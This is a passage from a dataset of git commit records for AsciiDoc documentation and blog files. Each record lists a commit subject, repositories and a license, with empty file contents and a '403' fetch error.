page\n","repos":"bibryam\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"404.adoc","new_file":"404.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ba7e88f2f661392b8c8da96894cd76a52cf2e93","subject":"Update 2016-10-27-Demo.adoc","message":"Update 2016-10-27-Demo.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Demo.adoc","new_file":"_posts\/2016-10-27-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f4a09c777c58f513b5427aa2502e199db31441c","subject":"Update 2013-5-12-Test-Notes.adoc","message":"Update 2013-5-12-Test-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-5-12-Test-Notes.adoc","new_file":"_posts\/2013-5-12-Test-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc7bca5ad6722e4ad7c27cc097e37ee1fa02889","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb8be9b7ebf9df6c2abc60bc6e728edca07fd422","subject":"Update 2017-10-19-HTML-Diff.adoc","message":"Update 2017-10-19-HTML-Diff.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-19-HTML-Diff.adoc","new_file":"_posts\/2017-10-19-HTML-Diff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fcdd0b7df03690865a9e716a752ab5c41687e02","subject":"2016-07-18-Stockholm.adoc","message":"2016-07-18-Stockholm.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-18-Stockholm.adoc","new_file":"_posts\/2016-07-18-Stockholm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f247fd02ae2e378f73f73e9901fb61decc0e482d","subject":"Update 2019-05-29.adoc","message":"Update 2019-05-29.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2019-05-29.adoc","new_file":"_posts\/2019-05-29.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecda8dd0dbeffba42e8ccb7ac2c43f00a5e6d497","subject":"y2b create post 3 Cool Tech Deals - #9","message":"y2b create post 3 Cool Tech Deals - #9","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-20-3-Cool-Tech-Deals--9.adoc","new_file":"_posts\/2015-09-20-3-Cool-Tech-Deals--9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a5f84b4409efeccca61d6b70d71a41a840d817","subject":"Update 2015-10-22-north_india_trip_tax.adoc","message":"Update 2015-10-22-north_india_trip_tax.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-22-north_india_trip_tax.adoc","new_file":"_posts\/2015-10-22-north_india_trip_tax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"635b44afa39797d791184184e0132448c3287d18","subject":"Update 2017-09-18-UIUCTF-2017-Crypto.adoc","message":"Update 2017-09-18-UIUCTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-18-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e11df82804694ff53917a669ef2ccec3bd7dfba","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"959ad10650d7d2d9c5ff1e8ac4f54e0957005f27","subject":"y2b create post Massive 38-inch Monitor = Mind Blown!","message":"y2b create post Massive 38-inch Monitor = Mind Blown!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-22-Massive-38inch-Monitor--Mind-Blown.adoc","new_file":"_posts\/2016-09-22-Massive-38inch-Monitor--Mind-Blown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"654f9da22b790c6a36ac7e3d3f69231cb852fead","subject":"Update 2017-05-07-Book-Review-Flowers-of-Algernon.adoc","message":"Update 2017-05-07-Book-Review-Flowers-of-Algernon.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-05-07-Book-Review-Flowers-of-Algernon.adoc","new_file":"_posts\/2017-05-07-Book-Review-Flowers-of-Algernon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6716d2ad775b22d800020b803bb8705e8973373","subject":"Update 2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","message":"Update 2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","new_file":"_posts\/2016-03-08-Be-an-armchair-imagineer-in-Disney-Magic-Kingdoms-coming-soon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d822a642b0d3af72a4b43c7e4ad4d9600343cfea","subject":"Document how to run a single docs test","message":"Document how to run a single docs test\n","repos":"JervyShi\/elasticsearch,obourgain\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,liweinan0423\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,coding0011\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,henakamaMSFT\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,JervyShi\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,JSCooke\/elasticsearch,jprante\/elasticsearch,njlawton\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,mikemccand\/elasticsearch,obourgain\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,gmarz\/elasticsearch,nilabhsagar\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,liweinan0423\/elasticsearch,spiegela\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,C-Bish\/elasticsearch,spiegela\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,C-Bish\/elasticsearch,mortonsykes\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,artnowo\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,spiegela\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,robin13\/elasticsearch,i-am-Nathan\/elasticsearch,liweinan0423\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,winstonewert\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,henakamaMSFT\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,Shepard1212\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,gmarz\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,glefloch\/elasticsearch,bawse\/elasticsearch,mjason3\/elasticsearch,elasticdog\/elasticsearch,MisterAndersen\/elasticsearch,gmarz\/elasticsearch,gmarz\/elasticsearch,mohit\/elasticsearch,MaineC\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,wuranbo\/elasticsearch,robin13\/elasticsearch,mortonsykes\/elasticsearch,ZTE-PaaS\/elasticsearch,liweinan0423\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,mortonsykes\/elasticsearch,scottsom\/elasticsearch,MaineC\/elasticsearch,gingerwizard\/elasticsearch,geidies\/elasticsearch,artnowo\/elasticsearch,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,JervyShi\/elasticsearch,MisterAndersen\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elasticassandra,naveenhooda2000\/elasticsearch,C-Bish\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,HonzaKral\/elasticsearch,artnowo\/elasticsearch,wenpos\/elasticsearch,StefanGor\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,nazarewk\/elasticsearch,s1monw\/elasticsearch,obourgain\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,ZTE-PaaS\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,coding0011\/elasticsearch,JervyShi\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,LewayneNaidoo\/elasticsearch,bawse\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,IanvsPoplicola\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,wuranbo\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,StefanGor\/elasticsearch,MisterAndersen\/elasticsearch,StefanGor\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,henakamaMSFT\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,naveenhooda2000\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,Helen-Zhao\/elasticsearch,Shepard1212\/elasticsearch,MisterAndersen\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,Shepard1212\/elasticsearch,glefloch\/elasticsearch,yanjunh\/elasticsearch,LeoYao\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,LewayneNaidoo\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,shreejay\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,mikemccand\/elasticsearch,fforbeck\/elasticsearch,mikemccand\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,yanjunh\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,rlugojr\/elasticsearch","old_file":"docs\/README.asciidoc","new_file":"docs\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc0730eeadabf00c8283d894fc63ca438b995893","subject":"Added the CIP Template","message":"Added the CIP Template\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP-Template.adoc","new_file":"cip\/CIP-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6171d86ee3e1471cb6f057cd9172ebb79a05914","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/10\/10\/deref.adoc","new_file":"content\/news\/2022\/10\/10\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3b9f53f48a5e8d6f2cd156810666e9610975d6a6","subject":"add content for querying metric definitions","message":"add content for querying metric definitions\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfd6210d95457a8c7d969598978a69508ea2cb60","subject":"doc\/users-guide: add time API section","message":"doc\/users-guide: add time API section\n\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Ivan Khoronzhuk <15ad2a232c436ab54d1b78ef06a09c4cd03911f0@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6daa3b9a3e8dd73dbb9cc9cb9cc3480a338fae07","subject":"compare both reflection API PHP5 and Reflect 2","message":"compare both reflection API PHP5 and Reflect 2\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/features-compared.asciidoc","new_file":"docs\/features-compared.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"229139f76e8f8250e23766ea2b0827869d3db9c8","subject":"add Developing Patches page from community wiki","message":"add Developing Patches page from community wiki\n","repos":"clojure\/clojure-site","old_file":"content\/community\/developing_patches.adoc","new_file":"content\/community\/developing_patches.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"213caaa50747ecee9b70782aa98bcb1aecbfe141","subject":"y2b create post ULTIMATE GAMING SETUP - THE DIVISION","message":"y2b create post ULTIMATE GAMING SETUP - THE DIVISION","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-18-ULTIMATE-GAMING-SETUP--THE-DIVISION.adoc","new_file":"_posts\/2016-03-18-ULTIMATE-GAMING-SETUP--THE-DIVISION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f21744edbf84c84332b1e31de78a1be6a1d437fe","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b6d607796767605578bf620a6118ca3235492c4","subject":"usage example for apoc.cypher.runMany","message":"usage example for apoc.cypher.runMany\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runMany.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/apoc.cypher.runMany.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a664646732aaaab47015424ad06b017b04e6a359","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c21a9282f5850a504bf82325bb065a8fb0f5cc96","subject":"adding clarifications, more coming","message":"adding clarifications, more coming\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed14542ef15b3ba876ecd985269645a04ad95456","subject":"doc: update napatech support by mlilja","message":"doc: update napatech support by mlilja\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_book.asciidoc","new_file":"doc\/trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77eadefa15cf976bd45d322ef3bc66726fadd1c8","subject":"KUDU-1375: [docs] Remove \"binaries\" in the Build from Source section","message":"KUDU-1375: [docs] Remove \"binaries\" in the Build from Source section\n\n- make install does not install the Kudu binaries\n\nChange-Id: I5b1e7337cdd9f04eea1c2b4da3d27b9815553121\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12060\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1b8d4d862d726b0e7111931283b025b9e877687","subject":"Create 2015-09-15-forge-2.19.1.final.asciidoc","message":"Create 2015-09-15-forge-2.19.1.final.asciidoc","repos":"luiz158\/docs,forge\/docs,luiz158\/docs,forge\/docs","old_file":"news\/2015-09-15-forge-2.19.1.final.asciidoc","new_file":"news\/2015-09-15-forge-2.19.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1171a221bfac14f960c7a82ae738f6a29eac0c8f","subject":"Updated doc\/INTRODUCTION.adoc","message":"Updated 